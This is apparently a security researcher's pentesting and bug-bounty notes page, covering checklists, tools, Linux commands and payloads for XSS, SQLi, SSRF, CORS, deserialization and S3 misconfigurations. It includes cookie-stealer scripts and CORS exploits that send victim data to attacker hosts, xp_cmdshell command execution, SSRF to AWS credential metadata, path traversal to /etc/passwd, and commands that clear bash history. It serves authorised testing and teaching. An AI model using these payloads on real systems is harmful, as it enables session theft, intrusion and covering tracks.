███████╗ █████╗ ███████╗██╗ ██╗ ██████╗
██╔════╝██╔══██╗██╔════╝╚██╗ ██╔╝██╔════╝
█████╗ ███████║███████╗ ╚████╔╝ ██║ ███╗
██╔══╝ ██╔══██║╚════██║ ╚██╔╝ ██║ ██║
███████╗██║ ██║███████║ ██║ ╚██████╔╝
╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝
Made with <3 by Riccardo Malatesta (@seeu)
EasyG started out as a script that I use to automate some information gathering tasks for PenTesting and Bug Hunting, you can find it here. Now it's more than that.
Here I gather all the resources about PenTesting and Bug Bounty Hunting that I find interesting: notes, payloads and links.
- Blog / Writeups / News & more
- Safety tips
- Check-lists
- Content Discovery
- Tools
- Network
- Linux
- Web vulnerabilities
- XSS
- SQLi
- SSRF
- Authentication vulnerabilities
- Access control vulnerabilities and privilege escalation
- Directory Traversal
- Business logic vulnerabilities
- CORS
- Deserialization
- HTTP Host header attacks
- Abusing S3 Bucket Permissions
- GraphQL
- WordPress
- IIS - Internet Information Services
- Lotus Domino
- Git source code exposure
- Subdomain takeover
- Thick client vulnerabilities
- https://portswigger.net/research
- https://www.skeletonscribe.net
- https://cvetrends.com/
- https://wiki.owasp.org/index.php/Testing_Checklist
- https://packetstormsecurity.com/
- https://twitter.com/hashtag/bugbountytips
- https://securib.ee/
- https://samcurry.net/
- https://blog.intigriti.com/hackademy/xss-challenges/
- https://hackerone.com/hacktivity
- https://pentester.land/list-of-bug-bounty-writeups.html
- https://github.com/juliocesarfort/public-pentesting-reports
- https://pentestreports.com/
- https://pentestbook.six2dez.com/
- https://xcellerator.github.io/
- https://persistence-info.github.io/
- For RCE
- Never upload a shell at first, you can be banned from a program. Just execute a
whoami
as a PoC, proceed with a shell if required/allowed.
- Never upload a shell at first, you can be banned from a program. Just execute a
- For stored XSS
console.log()
is better thanalert()
, it makes less noise especially for stored XSS.
- For SQLi
- Don't dump the entire db, you can be banned from a program. Just retrieve the db's name, version and/or other minor infos. Proceed with db dump only if required/allowed;
- Don't use tautologies like
OR 1=1
, it can end up in a delete query or something dangerous. It's better to useAND SLEEP(5)
orte'+'st
.
- For subdomain takeovers
- use as a PoC an html page like:
9a69e2677c39cdae365b49beeac8e059.html<!-- PoC by seeu -->
- use as a PoC an html page like:
- Mobile Application Penetration Testing Cheat Sheet
- SMB-Checklist
- Win32 Offensive Cheatsheet
- Regexp Security Cheatsheet
- Cheat-Sheet - Active-Directory
- Copyright 1995
- Server: Apache 2.2
- Expider SSL Certificate
- "Internal" in hostname
- Shodan returns CVEs
- Nuclei template matches
- Integrations
- Application Libraries (usually JavaScript)
- Application: Custom Code or COTS
- Application Framework
- Web Hosting Software (Default creds, Web server misconfigurations, web exploits)
- Open Ports and Services (Default creds on services, service level exploits)
Multiple targets
- Run EasyG assetenum + take screenshots or open results in firefox
- Select the interesting targets, see Risk markers
Single target
- Test Register
- Test Login: 2FA, Password reset, Open Redirect & co.
- Upload Functions
- Broken Access Control, IDOR & co
- Content Types
- Look for multipart-forms
- Look for content type XML
- Look for content type json
- APIs
- Methods
- API Security Checklist
- Account Section
- Profile
- Stored XSS
- App Custom Fields
- Integrations
- SSRF, XSS
- Profile
- Errors
- OWASP Web Application Penetration Checklist v1.1
- Integrations (from 3rd party)
- XSS
- Self Uploads
- XML based (Docs/PDF)
- SSRF, XSS
- Image
- XSS, Shell
- Name
- Binary header
- Metadata
- XSS, Shell
- XML based (Docs/PDF)
- Where is data stored?
Some tips
- If the application is ASP.NET, search for
Appsettings.json
- Use recursion. If you encounter a
401
response, search with waybackmachine - Search for past reports in the same program
Check the tech of a target with
- Wappalyzer
- Webanalyze Port of Wappalyzer for command line
./webanalyze -host example.com -crawl 1
Tools
- feroxbuster
feroxbuster -u https://example.com/ --proxy http://127.0.0.1:8080 -k -w wordlist.txt -s 200,403
- dirsearch
- changedetection.io
- ffuf
Wordlists
To find more endpoints
- Apkleak to get endpoints from an apk
- Source2Url to get endpoints from a source code
- waymore more results from the Wayback Machine
- xnLinkFinder
- BurpJSLinkFinder
Google Dorking
ext:
to search for: php, php3, aspx, asp, jsp, xhtml, phtml, html, xsp, nsf, form;- Search also for pdf, xlsx and similar, they may contain some infos;
site:
to target a website and its subdomains;inurl:&
to search for parameters;intitle:
to search interesting pages like admin, register, login etc.- Dorking on Steroids
"Seeing something unexpected? Take a look at the GitHub profile guide." "COMPANY-TARGET" site:http://github.com
[Reference]- dorks_hunter
GitHub Dorking
- sensitive words:
password, api_key, access_key, dbpassword, dbuser, pwd, pwds, aws_access, key, token, credentials, pass, pwd, passwd, private, preprod, appsecret
- languages:
json, bash, shell, java etc.
, exampleHEROKU_API_KEY language:json
- extensions:
extensions: bat, config, ini, env etc.
- filename:
netrpc, .git-credentials, .history, .htpasswd, bash_history
- Other dorks
For a temporary public server
For auths
- textverified.com for auths requiring a phone number
- temp-mail.org
- To have multiple email adresses using gmail, you can add a
+
sign after your email's alias. For example: if your email isjanedoe@gmail.com
and you sign up for Twitter you can sign up usingjanedoe+twitter@gmail.com
. [Reference]
To find parameters
- Arjun detection of the parameters present in the application
- ParamSpider
Asset enumeration/discovery
- nmap
- Discover everything + services
nmap -p 1-65535 -sV -T4 -Pn -n -vv -iL target.txt -oX out.xml
- Discover everything + services
- bgp.he.net to find ASN +
amass intel -asn <ASN>
- crt.sh
- Crtsh-Fetcher
- To find new domains
cat json.txt | jq -r '.[].common_name' | sed 's/\*//g' | sort -u | rev | cut -d "." -f 1,2 | rev | sort -u | tee out.txt
- naabu
- Discover everything faster
naabu -l 1.txt -v -p - -exclude-ports 80,443,81,3000,3001,8000,8080,8443 -c 1000 -rate 7000 -stats -o 1_o.txt
- Discover everything faster
- gobuster + all.txt by jhaddix
- you can use gb.rb
- dnsx
- Reverse DNS lookup
cat ip.txt | dnsx -ptr -resp-only
- Reverse DNS lookup
- VhostScan to discover virtual hosts
To find vulnerabilities
- Tplmap for SSTI exploitation
- CSRF PoC Generator
- BruteSpray
python brutespray.py --file nmap.xml --threads 5 --hosts 5
- cmd.aspx
- SearchSploit Port services vulnerability checks
- nuclei
- Automatic Selection
nuclei -u http://target.io -as
- Check for Exposed panels
%USERPROFILE%\nuclei-templates\exposed-panels
- Check for Technologies
%USERPROFILE%\nuclei-templates\technologies
- Check for more
-t %USERPROFILE%\nuclei-templates\misconfiguration -t %USERPROFILE%\nuclei-templates\cves -t %USERPROFILE%\nuclei-templates\cnvd
- Use it in a workflow
cat subdomains.txt | httpx | nuclei -t technologies
- nuclei geeknik
- Automatic Selection
- CMSeeK CMS Detection & Exploitation Suite
- ppfuzz a fast tool to scan client-side prototype pollution vulnerability
Decompilers
- VB Decompiler decompile a VB application
- ILSpy | dnSpy .NET decompilers
- Java Decompiler
- dex2jar decompile an .apk into .jar
- jadx-gui another tool for producing Java source code from Android Dex and Apk files
- apktool to unpack an apk
Desktop Application / Thick Client Penetration Testing
- testssl.sh useful for checking outdated ciphers & co.
- Process Hacker It helps to dump the exe memory and see what sensitive data is there
- Echo Mirage to monitor the network interactions of an application
- Wireshark
- Sigcheck check the signature of an executable
Android
- adb it is used to debug an android device
- HTTP Toolkit to see requests on a non-rooted or emulated device, as an alternative to burp suite
- Genymotion an android emulator
- Android Studio Android application development, useful also for the emulator
- Note: to start only the emulator, use commands such as
cd C:\Users\Riccardo\AppData\Local\Android\Sdk\emulator emulator -avd Pixel_4_XL_API_30
- Note: to start only the emulator, use commands such as
For Reporting
Other
- URL Decoder/Encoder
- base64encode.org
- Down or not
- DigitalOcean See Setting Up Your Ubuntu Box for Pentest and Bug Bounty Automation
- trashcompactor to remove URLs with duplicate funcionality based on script resources included
- uro declutters url lists
- putty
- jdam - Structure-aware JSON fuzzing
- Impacket
- PCredz
- Visual Studio Code for Source Code Analysis
- beautifier.io for JavaScript Analysis
Used in easyg.rb
- amass
- subfinder
- github-subdomains
- crt.sh
- httprobe
type subs.txt | httprobe -p http:81 -p http:3000 -p https:3000 -p http:3001 -p https:3001 -p http:8000 -p http:8080 -p https:8443 -c 150 > out.txt
- anew
- naabu
naabu -v -list subs.txt -exclude-ports 80,443,81,3000,3001,8000,8080,8443 -stats -o out.txt
- gospider
- hakrawler
- Selenium
- nuclei
nuclei -l httprobe_results.txt -t %USERPROFILE%\nuclei-templates\takeovers -t %USERPROFILE%\nuclei-templates\exposures\configs\git-config.yaml -o out.txt
To add a domain + subdomains in advanced scopes: ^(.*\.)?test\.com$
Cool extensions:
- Turbo Intruder
- HTTP Request Smuggler
- Wsdler to interact with SOAP
- InQL
- BurpCustomizer
- Software Version Reporter
- Software Vulnerability Scanner
- IP Rotate
- Autorize
- Active Scan++
- BurpJSLinkFinder
- Anonymous Cloud
ip route add <net_address_in_cdr> via <interface_gateway>
route add <net_address_in_cdr> mask <net_address_mask_in_cdr> <interface_gateway> (Windows)
nmap -sn <net_address_in_cdr> | Check hosts alive, adding -A you gather more info for a target
Linux Commands
netstat -tulpn Show Linux network ports with process ID’s (PIDs)
watch ss -stplu Watch TCP, UDP open ports in real time with socket summary.
lsof -i Show established connections.
macchanger -m MACADDR INTR Change MAC address on KALI Linux.
ifconfig eth0 192.168.2.1/24 Set IP address in Linux.
ifconfig eth0:1 192.168.2.3/24 Add IP address to existing network interface in Linux.
ifconfig eth0 hw ether MACADDR Change MAC address in Linux using ifconfig.
ifconfig eth0 mtu 1500 Change MTU size Linux using ifconfig, change 1500 to your desired MTU.
dig -x 192.168.1.1 Dig reverse lookup on an IP address.
host 192.168.1.1 Reverse lookup on an IP address, in case dig is not installed.
dig @192.168.2.2 domain.com -t AXFR Perform a DNS zone transfer using dig.
host -l domain.com nameserver Perform a DNS zone transfer using host.
nbtstat -A x.x.x.x Get hostname for IP address.
ip addr add 192.168.2.22/24 dev eth0 Adds a hidden IP address to Linux, does not show up when performing an ifconfig.
tcpkill -9 host google.com Blocks access to google.com from the host machine.
echo \"1\" > /proc/sys/net/ipv4/ip_forward Enables IP forwarding, turns Linux box into a router – handy for routing traffic through a box.
echo \"8.8.8.8\" > /etc/resolv.conf Use Google DNS.
Linux User Management
whoami Shows currently logged in user on Linux.
id Shows currently logged in user and groups for the user.
last Shows last logged in users.
mount Show mounted drives.
df -h Shows disk usage in human readable output.
echo \"user:passwd\" | chpasswd Reset password in one line.
getent passwd List users on Linux.
strings /usr/local/bin/blah Shows contents of none text files, e.g. whats in a binary.
uname -ar Shows running kernel version.
PATH=$PATH:/my/new-path Add a new PATH, handy for local FS manipulation.
history Show bash history, commands the user has entered previously.
Linux File Commands
df -h blah Display size of file / dir Linux.
diff file1 file2 Compare / Show differences between two files on Linux.
md5sum file Generate MD5SUM Linux.
md5sum -c blah.iso.md5 Check file against MD5SUM on Linux, assuming both file and .md5 are in the same dir.
file blah Find out the type of file on Linux, also displays if file is 32 or 64 bit.
dos2unix Convert Windows line endings to Unix / Linux.
base64 < input-file > output-file Base64 encodes input file and outputs a Base64 encoded file called output-file.
base64 -d < input-file > output-file Base64 decodes input file and outputs a Base64 decoded file called output-file.
touch -r ref-file new-file Creates a new file using the timestamp data from the reference file, drop the -r to simply create a file.
rm -rf Remove files and directories without prompting for confirmation.
Misc Commands
init 6 Reboot Linux from the command line.
gcc -o output.c input.c Compile C code.
gcc -m32 -o output.c input.c Cross compile C code, compile 32 bit binary on 64 bit Linux.
unset HISTORYFILE Disable bash history logging.
rdesktop X.X.X.X Connect to RDP server from Linux.
kill -9 $$ Kill current session.
chown user:group blah Change owner of file or dir.
chown -R user:group blah Change owner of file or dir and all underlying files / dirs – recersive chown.
chmod 600 file Change file / dir permissions, see [Linux File System Permissons](#linux-file-system-permissions) for details.
ssh user@X.X.X.X | cat /dev/null > ~/.bash_history Clear bash history
Linux File System Permissions
777 rwxrwxrwx No restriction, global WRX any user can do anything.
755 rwxr-xr-x Owner has full access, others can read and execute the file.
700 rwx------ Owner has full access, no one else has access.
666 rw-rw-rw- All users can read and write but not execute.
644 rw-r--r-- Owner can read and write, everyone else can read.
600 rw------- Owner can read and write, everyone else has no access.
Linux Directories
/ / also know as “slash” or the root.
/bin Common programs, shared by the system, the system administrator and the users.
/boot Boot files, boot loader (grub), kernels, vmlinuz
/dev Contains references to system devices, files with special properties.
/etc Important system config files.
/home Home directories for system users.
/lib Library files, includes files for all kinds of programs needed by the system and the users.
/lost+found Files that were saved during failures are here.
/mnt Standard mount point for external file systems.
/media Mount point for external file systems (on some distros).
/net Standard mount point for entire remote file systems – nfs.
/opt Typically contains extra and third party software.
/proc A virtual file system containing information about system resources.
/root root users home dir.
/sbin Programs for use by the system and the system administrator.
/tmp Temporary space for use by the system, cleaned upon reboot.
/usr Programs, libraries, documentation etc. for all user-related programs.
/var Storage for all variable files and temporary files created by users, such as log files, mail queue,
print spooler. Web servers, Databases etc.
Linux Interesting Files / Directories
/etc/passwd Contains local Linux users.
/etc/shadow Contains local account password hashes.
/etc/group Contains local account groups.
/etc/init.d/ Contains service init script – worth a look to see whats installed.
/etc/hostname System hostname.
/etc/network/interfaces Network interfaces.
/etc/resolv.conf System DNS servers.
/etc/profile System environment variables.
~/.ssh/ SSH keys.
~/.bash_history Users bash history log.
/var/log/ Linux system log files are typically stored here.
/var/adm/ UNIX system log files are typically stored here.
/var/log/apache2/access.log Apache access log file typical path.
/var/log/httpd/access.log Apache access log file typical path.
/etc/fstab File system mounts.
- Escalating XSS in PhantomJS Image Rendering to SSRF/Local-File Read
- For hidden inputs:
accesskey="X" onclick="alert(1)"
then Press ALT+SHIFT+X on Windows / CTRL+ALT+X on OS X - For mobile applications: try use as a vector the name of the phone with a payload like
"/><script>alert(1)</script>
- For desktop applications: try use as a vector the SSID with a payload like
"/><img src=x onerror=alert(1)>
Tools
- xsscrapy
- XSS Hunter for blind XSS
- AwesomeXSS
- ppfuzz a fast tool to scan client-side prototype pollution vulnerability
CSP bypass
Bypasses
- https://www.googleapis.com/customsearch/v1?callback=alert(document.domain)
- JSFuck
- Path Relative style sheet injection
- Cross-site scripting (XSS) cheat sheet
- Shortest rXSS possible
- If Privileges are required, see if you can chain the XSS with a CSRF
Swagger XSS
- swagger-api/swagger-ui#1262
- swagger-api/swagger-ui#3847
?url=https://raw.githubusercontent.com/seeu-inspace/easyg/main/XSS%20all%20the%20things/swag-test.json
- Hacking Swagger-UI - from XSS to account takeovers
?configUrl=data:text/html;base64,ewoidXJsIjoiaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL3NlZXUtaW5zcGFjZS9lYXN5Zy9tYWluL1hTUyUyMGFsbCUyMHRoZSUyMHRoaW5ncy9zd2FnLXRlc3QueWFtbCIKfQ==
- Nuclei template
%USERPROFILE%\nuclei-templates\exposures\apis\swagger-api.yaml
CRLF injection [Reference]
/%0D%0AX-XSS-Protection%3A%200%0A%0A%3cscript%3ealert(document.domain)%3c%2fscript%3e%3c!--
/%E5%98%8D%E5%98%8AX-XSS-Protection%3A%200%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%8A%3cscript%3ealert(document.domain)%3c%2fscript%3e%3c!--
- Nuclei template
%USERPROFILE%\nuclei-templates\vulnerabilities\generic\crlf-injection.yaml
Cross Site Tracing
- If cookies are protected by the HttpOnly flag but the TRACE method is enabled, a technique called Cross Site Tracing can be used. Reference: https://owasp.org/www-community/attacks/Cross_Site_Tracing
Blind XSS
- Insert a payload in the User-Agent, try with the match/replace rule
- Other endpoints: pending review comments, feedback
DoS
%22%27%22%3E%3CMETA%20HTTP-EQUIV%3Drefresh%20CONTENT%3D1%3E%3F%3D
This could lead the page to refresh quickly and infinitely causing being blocked by a WAF and being a potential DoS.
Payloads
- HTML inj
<p style="color:red">ERROR! Repeat the login</p>Membership No.<br/><input><br/><a href=http://evil.com><br><input type=button value="Login"></a><br/><img src=http://evil.com style="visibility:hidden">
- iframe + base64 encoded SVG
<iframe src="data:image/svg+xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBzdGFuZGFsb25lPSJubyI/Pgo8IURPQ1RZUEUgc3ZnIFBVQkxJQyAiLS8vVzNDLy9EVEQgU1ZHIDEuMS8vRU4iICJodHRwOi8vd3d3LnczLm9yZy9HcmFwaGljcy9TVkcvMS4xL0RURC9zdmcxMS5kdGQiPgoKPHN2ZyB2ZXJzaW9uPSIxLjEiIGJhc2VQcm9maWxlPSJmdWxsIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPgogICA8cmVjdCB3aWR0aD0iMzAwIiBoZWlnaHQ9IjEwMCIgc3R5bGU9ImZpbGw6cmdiKDAsMCwyNTUpO3N0cm9rZS13aWR0aDozO3N0cm9rZTpyZ2IoMCwwLDApIiAvPgogICA8c2NyaXB0IHR5cGU9InRleHQvamF2YXNjcmlwdCI+CiAgICAgIGFsZXJ0KGRvY3VtZW50LmRvbWFpbik7CiAgICAgIGFsZXJ0KGRvY3VtZW50LmNvb2tpZSk7CiAgIDwvc2NyaXB0Pgo8L3N2Zz4="></iframe>
- Cookie stealers
-
fetch('https://ATTACKER-WEBSITE', {method: 'POST',mode: 'no-cors',body:document.cookie});
-
document.write('<img src=\"http://ATTACKER-WEBSITE/?cookie=' + document.cookie + '\" />')
-
<img src=x onerror=this.src='http://ATTACKER-WEBSITE/?'+document.cookie;>
-
Tools
> SQLMap: sqlmap -u https://vulnerable/index.php?id=1
--tables (to see db)
-D DATABASE_NAME -T TABLE_NAME --dump (to see data)
--forms --batch --crawl=10 --random-agent --level=5 --risk=3 (to crawl)
RCE
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
xp_cmdshell 'COMMAND';
EXEC sp_configure 'allow updates', 0
RECONFIGURE
EXEC sp_configure 'show advanced options', 1
GO
RECONFIGURE
GO
EXEC sp_configure 'xp_cmdshell', 1
GO
RECONFIGURE
GO
xp_cmdshell 'COMMAND';
SSRF with blacklist-based input filters bypass: Some applications block input containing hostnames like 127.0.0.1
and localhost, or sensitive URLs like /admin
. In this situation, you can often circumvent the filter using various techniques:
- Using an alternative IP representation of
127.0.0.1
, such as2130706433
,017700000001
, or127.1
; - Registering your own domain name that resolves to
127.0.0.1
. You can use spoofed.burpcollaborator.net for this purpose or the domainfirefox.fr
is a DNS that point to127.0.0.1
.; - Obfuscating blocked strings using URL encoding or case variation.
SSRF with whitelist-based input filters bypass
- You can embed credentials in a URL before the hostname, using the
@
character. For example:https://expected-host@evil-host
. - You can use the
#
character to indicate a URL fragment. For example:https://evil-host#expected-host
. - You can leverage the DNS naming hierarchy to place required input into a fully-qualified DNS name that you control. For example:
https://expected-host.evil-host
. - You can URL-encode characters to confuse the URL-parsing code. This is particularly useful if the code that implements the filter handles URL-encoded characters differently than the code that performs the back-end HTTP request.
- You can use combinations of these techniques together.
Other tips
- By combining it with an open redirect, you can bypass some restrictions. An example:
http://vulnerable.com/product/nextProduct?path=http://192.168.0.12:8080/admin/delete?username=carlos
- Open Redirect Bypass:
- For AWS, bypass some restrictions by hosting this PHP page (Reference):
<?php header('Location: http://169.254.169.254/latest/meta-data/iam/security-credentials/aws-opsworks-ec2-role', TRUE, 303); ?>
- If everything fails, look for assets pointing to internal IPs. You can usually find these via CSP headers, JS files, Github, shodan/censys etc. [Reference]
- SSRF (Server Side Request Forgery) testing resources
Burp extensions
- Multi-factor authentication
- Try to intercept the response and modify the status to
200
; - Bruteforce.
- Try to intercept the response and modify the status to
- Password reset
- Change the
Host
with the host of your server. The request for a password reset might use theHost
value for the link with the reset token; - Try with headers like
X-Forwarded-Host:
.
- Change the
- Password change
- Keeping users logged in
In the context of web applications, access control is dependent on authentication and session management:
- Authentication identifies the user and confirms that they are who they say they are;
- Session management identifies which subsequent HTTP requests are being made by that same user;
- Access control determines whether the user is allowed to carry out the action that they are attempting to perform.
From a user perspective, access controls can be divided into the following categories:
- Vertical access controls Mechanisms that restrict access to sensitive functionality that is not available to other types of users
- Horizontal access controls Mechanisms that restrict access to resources to the users who are specifically allowed to access those resources
- Context-dependent access controls Restrict access to functionality and resources based upon the state of the application or the user's interaction with it
Tools
- Autorize
- Authz
- UUID Detector
- Check also endpoints in JS files
- simple case
https://insecure-website.com/loadImage?filename=..\..\..\windows\win.ini
- absolute path
https://insecure-website.com/loadImage?filename=/etc/passwd
- stripped non-recursively
https://insecure-website.com/loadImage?filename=....//....//....//etc/passwd
- superfluous URL-decode
https://insecure-website.com/loadImage?filename=..%252f..%252f..%252fetc/passwd
- validation of start of path
https://insecure-website.com/loadImage?filename=/var/www/images/../../../etc/passwd
- validation of start of path
https://insecure-website.com/loadImage?filename=../../../etc/passwd%00.png
Examples:
- Excessive trust in client-side controls
- 2FA broken logic
- Failing to handle unconventional input
- Inconsistent security controls
- Weak isolation on dual-use endpoint
- Password reset broken logic
- Insufficient workflow validation
- Flawed enforcement of business rules
- Authentication bypass via encryption oracle
Classic CORS vulnerability
<script>
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get','$url/accountDetails',true);
req.withCredentials = true;
req.send();
function reqListener() {
location='/log?key='+this.responseText;
};
</script>
CORS vulnerability with null origin
<iframe sandbox="allow-scripts allow-top-navigation allow-forms" src="data:text/html,<script>
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get','vulnerable-website.com/sensitive-victim-data',true);
req.withCredentials = true;
req.send();
function reqListener() {
location='malicious-website.com/log?key='+this.responseText;
};</script>">
</iframe>
CORS vulnerability with trusted insecure protocols
<script>
document.location="http://stock.$your-lab-url/?productId=4<script>var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','https://$your-lab-url/accountDetails',true); req.withCredentials = true;req.send();function reqListener() {location='https://$exploit-server-url/log?key='%2bthis.responseText; };%3c/script>&storeId=1"
</script>
Tools
- Corsy Corsy is a lightweight program that scans for all known misconfigurations in CORS implementations
Ysoserial
Because of Runtime.exec()
, ysoserial doesn't work well with multiple commands. After some research, I found a way to run multiple sys commands anyway, by using sh -c $@|sh . echo
before the multiple commands that we need to run. Here I needed to run the command host
and whoami
:
java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections7 'sh -c $@|sh . echo host $(whoami).<MY-'RATOR-ID>.burpcollaborator.net' | gzip | base64
PHPGGC is a library of unserialize() payloads along with a tool to generate them, from command line or programmatically.
Burp extensions:
- Java Deserialization Scanner
- Java Serialized Payloads
- GadgetProbe
- Freddy, Deserialization Bug Finder
- PHP Object Injection Check
- "If someone sends a cookie called '0', automattic.com responds with a list of all 152 cookies supported by the application: curl -v -H 'Cookie: 0=1' https://automattic.com/?cb=123 | fgrep Cookie" [Reference];
- CRLF injection [Reference], "When you find response header injection, you can probably do better than mere XSS or open-redir. Try injecting a short Content-Length header to cause a reverse desync and exploit random live users." [Reference]
Target example: http://[name_of_bucket].s3.amazonaws.com
Read Permission
aws s3 ls s3://[name_of_bucket] --no-sign-request
aws s3 ls s3://pyx-pkgs --recursive --human-readable --summarize
Write Permission
aws s3 cp localfile s3://[name_of_bucket]/test_file.txt –-no-sign-request
READ_ACP
aws s3api get-bucket-acl --bucket [bucketname] --no-sign
aws s3api get-object-acl --bucket [bucketname] --key index.html --no-sign-request
WRITE_ACP
aws s3api put-bucket-acl --bucket [bucketname] [ACLPERMISSIONS] --no-sign-request
aws s3api put-object-acl --bucket [bucketname] --key file.txt [ACLPERMISSIONS] --no-sign-request
Tools
- Anonymous Cloud
- AWS CLI
- S3Scanner A tool to find open S3 buckets and dump their contents
- Cloud - AWS Pentest
- s3enum
Resources
- https://blog.yeswehack.com/yeswerhackers/abusing-s3-bucket-permissions/
- https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_policies_examples_s3_rw-bucket.html
To analyze the schema: vangoncharov.github.io/graphql-voyager/ or InQL for Burp Suite.
GraphQL Introspection query
{"query": "{__schema{queryType{name}mutationType{name}subscriptionType{name}types{...FullType}directives{name description locations args{...InputValue}}}}fragment FullType on __Type{kind name description fields(includeDeprecated:true){name description args{...InputValue}type{...TypeRef}isDeprecated deprecationReason}inputFields{...InputValue}interfaces{...TypeRef}enumValues(includeDeprecated:true){name description isDeprecated deprecationReason}possibleTypes{...TypeRef}}fragment InputValue on __InputValue{name description type{...TypeRef}defaultValue}fragment TypeRef on __Type{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name}}}}}}}}"}
{query: __schema{queryType{name}mutationType{name}subscriptionType{name}types{...FullType}directives{name description locations args{...InputValue}}}}fragment FullType on __Type{kind name description fields(includeDeprecated:true){name description args{...InputValue}type{...TypeRef}isDeprecated deprecationReason}inputFields{...InputValue}interfaces{...TypeRef}enumValues(includeDeprecated:true){name description isDeprecated deprecationReason}possibleTypes{...TypeRef}}fragment InputValue on __InputValue{name description type{...TypeRef}defaultValue}fragment TypeRef on __Type{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name}}}}}}}}
{"operationName":"IntrospectionQuery","variables":{},"query":"query IntrospectionQuery {\n __schema {\n queryType {\n name\n }\n mutationType {\n name\n }\n subscriptionType {\n name\n }\n types {\n ...FullType\n }\n directives {\n name\n description\n locations\n args {\n ...InputValue\n }\n }\n }\n}\n\nfragment FullType on __Type {\n kind\n name\n description\n fields(includeDeprecated: true) {\n name\n description\n args {\n ...InputValue\n }\n type {\n ...TypeRef\n }\n isDeprecated\n deprecationReason\n }\n inputFields {\n ...InputValue\n }\n interfaces {\n ...TypeRef\n }\n enumValues(includeDeprecated: true) {\n name\n description\n isDeprecated\n deprecationReason\n }\n possibleTypes {\n ...TypeRef\n }\n}\n\nfragment InputValue on __InputValue {\n name\n description\n type {\n ...TypeRef\n }\n defaultValue\n}\n\nfragment TypeRef on __Type {\n kind\n name\n ofType {\n kind\n name\n ofType {\n kind\n name\n ofType {\n kind\n name\n ofType {\n kind\n name\n ofType {\n kind\n name\n ofType {\n kind\n name\n ofType {\n kind\n name\n }\n }\n }\n }\n }\n }\n }\n}\n"}
- Information Disclosure [high]:
/_wpeprivate/config.json
- Data exposure:
/wp-json/wp/v2/users/
/wp-json/th/v1/user_generation
/?rest_route=/wp/v2/users
- xmlrpc.php enabled, reference. Send a post request to this endpoint with a body like this:
<?xml version="1.0" encoding="utf-8"?> <methodCall> <methodName>system.listMethods</methodName> <params></params> </methodCall>
- Use Nuclei to detect WordPress websites from a list of targets with:
nuclei -l subdomains.txt -t %USERPROFILE%/nuclei-templates/technologies/wordpress-detect.yaml
- Scan with WPScan github.com/wpscanteam/wpscan with:
wpscan --url <domain> --api-token <your-api-token>
Resources
- https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/WordPress.md
- https://www.rcesecurity.com/2022/07/WordPress-Transposh-Exploiting-a-Blind-SQL-Injection-via-XSS/
- WordPress Checklist
- Wordlist iisfinal.txt
- Check if
trace.axd
is enabled - Other common files
- Search for
Views/web.config bin/WebApplication1.dll System.Web.Mvc.dll System.Web.Mvc.Ajax.dll System.Web.Mvc.Html.dll System.Web.Optimization.dll System.Web.Routing.dll
- Find Lotus Domino with nuclei:
%USERPROFILE%\nuclei-templates\technologies\lotus-domino-version.yaml
- Exploit DB: Lotus-Domino
- Fuzzing list: SecLists/LotusNotes.fuzz.txt
Once you have the source code, look for the secrets within the files.
Tools
- DotGit find if a website has
.git
exposed - nuclei template
%USERPROFILE%\nuclei-templates\exposures\configs\git-config.yaml
- GitDumper from GitTools
Tools
- Can I take over XYZ?
- nuclei template
%USERPROFILE%\nuclei-templates\takeovers
Tools
- Process Monitor to see which DLLs are missing for an exe and do DLL Hijacking
Using Process Monitor, set the filters to find missing dlls.
After that, insert the dll in the position of the missing ones with the same name. An example of a dll:
#include <windows.h>
BOOL WINAPI DllMain(HANDLE hDll, DWORD dwReason, LPVOID lpReserved) {
switch (dwReason)
{
case DLL_PROCESS_ATTACH:
MessageBox(NULL,
"success!!",
"pwned",
MB_ICONERROR | MB_OK
);
break;
}
return TRUE;
}
Resources